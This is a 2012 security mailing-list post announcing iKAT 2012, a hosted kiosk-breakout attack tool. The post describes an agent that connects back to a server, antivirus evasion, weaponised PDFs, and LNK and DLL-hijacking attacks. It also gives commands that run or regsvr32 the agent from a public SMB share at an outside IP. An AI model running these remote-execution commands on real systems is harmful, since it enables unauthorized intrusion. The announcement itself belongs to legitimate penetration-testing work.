Penetration Testing
iKAT 2012 Release - Interactive Kiosk Attack Tool Aug 12 2012 08:05AM
Paul Craig (paul ha cked net)
iKAT 2012 - Interactive Kiosk Attack Tool
Beating Heart Edition
-----------------------------------------------------------------

It is with great pleasure that i would like to release this years
edition of iKAT - The Interactive Kiosk Attack Tool.
http://ikat.ha.cked.net

*.ha.cked.net to bypass pesky blacklist filters ( also available on https )

Over the last 5 years iKAT has grown in popularity and is now the
de-facto standard for conducting penetration tests against
'controlled'
browser environments such as Citrix Terminals, Kiosks, WebTV's and
even In flight Entertainment systems.
iKAT is visited by over 100 confirmed Kiosks or Citrix environments
per-day and is currently spawning on average 3 system shells per hour.

iKAT is a 100% free SaaS website that you can visit from any browser
environment. iKAT will attempt to exploit the browser and spawn a
local shell for you.
This years version has had a major re-work on both the design/layout
and the underlying technology and aims to provide the smoothest,
fruitful experience yet.
I do hope you all enjoy the sleepless nights and hard work that has
been invested into iKAT 2012.

iKAT 2012 will be officially released + Demo'd at XCON 2012 in Beijing
China next week.

New Features of iKAT 2012:

Layout:
-----------------------------------------------
During Defcon 19 i was approached by a sprightly girl with bright red
hair who asked me if i was "that Kiosk guy?"
I replied yes? And she proceeded to abuse my HTML development skill,
and told me that although iKAT is
technically a great tool - it resembles a 12year old's wordpress site.
Turns out this sprightly (and inebriated) girl was a web developer, so
i took her name-card and after the
conference emailed her and demanded that since she ridiculed my
development skills, she should write
me a new layout for iKAT, for free.
It is with great pleasure that i can say that iKAT is now "nice"
looking, easier to navigate, Web 2.0, and fully W3C compliant!
Big thanks to Melanie Wilke - http://melaniewilke.com, for her
donation of both time and effort.

Client / Server Model:
------------------------------
One of the largest technological changes in iKAT is the implementation
of a client/server model.
Kiosk vendors and AV vendors have been quick to blacklist and block my
tools and the success rate of previous iKAT
versions has been decreasing, so the only approach i found to work was
to drop a small iKAT Agent
and connect back to the iKAT server. The iKAT server will do all of
the post exploitation work for you!
This provides a much higher rate of success as i am able to kill and
evade AV, there is also a much higher
chance of not only spawning shells - but spawning system shells.
Over time the post exploitation methods will be refined to help you
stay one step ahead.
The iKAT agent has been included in each of the payloads and
exploitation methods so nothing changes in how you use iKAT.

New Tools / Exploits / Bug Fixes:
-------------------------------------------------
A raft of new tools and exploits have been developed for iKAT 2012 to
increase the attacks available to you.

These include:
Dynamic In-Memory Process Patching to generically defeat Windows Local
Group Policy
Additional SRP Bypass Techniques
Top #10 PDF exploits pre-loaded with iKAT agents
Available DLL content
Upgraded/Improved/Fixed tools.

New Browser Crashes:
-----------------------------------------------
The fuzzing servers have been working overtime finding new
(none-exploitable) crash conditions for popular browsers.
These exploits simply allow you to crash and close a browser, often
leading to the underlying desktop being exposed.
I dubbed this exploit "Emo-Kiosking", and although crashing the
browser may sound crude - it has proven to be the most
effective exploit against controlled browser environments as the
end-goal is to escape the browser.

Samba Service
---------------------------------------------
iKAT now contains a world readable SMB share hosting the iKAT agents
in DLL and EXE form.
Hosted at \\120.138.22.77\ikat this share contains ikat.exe and
ikat.dll and a suite of other tools.
This allows you to simply run \\120.138.22.77\ikat\ikat.exe from the
command line to load the iKAT agent.
Alternatively you can regsvr32 \\120.138.22.77\ikat\ikat.dll to
complete the same task.
This is incredibly handy when you are able to execute commands, but
cannot download a file.

Updated PhotoKAT:
-----------------------------------------------
PhotoKAT is the lesser-known Photo Kiosk exploitation tool.
This tool should be extracted to a USB Key or Memory Card and plugged
into Photo Kiosk.
PhotoKAT now attempts many new generic exploits against common Photo
Kiosk terminals.

Attacks include:
.LNK Shortcut Exploit to the iKAT Agent on the iKAT SMB server
DLL Hijacking of common libraries
Autorun.inf
Malicious PDF Files loaded with iKAT Agents
A suite of iKAT Tools

Donation:
-----------------------------------------------
iKAT is a labor of love, and everything from the hosting, design,
research and exploits are donated by the community.
However there are some things that cost money, like our code-signing
certificate, and often real cash is required.
If you have ever used iKAT to pop shells on a job, or the project has
helped you in some way - please donate to the cause.
Every dollar helps and will go directly towards fighting the good fight.

My thanks to everyone who has helped the iKAT project over the years,
their names are included on the website.

Thanks

Paul Craig

------------------------------------------------------------------------

This list is sponsored by: Information Assurance Certification Review Board

Prove to peers and potential employers without a doubt that you can actually do a proper penetration test. IACRB CPT and CEPT certs require a full practical examination in order to become certified.

http://www.iacertification.org
------------------------------------------------------------------------

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus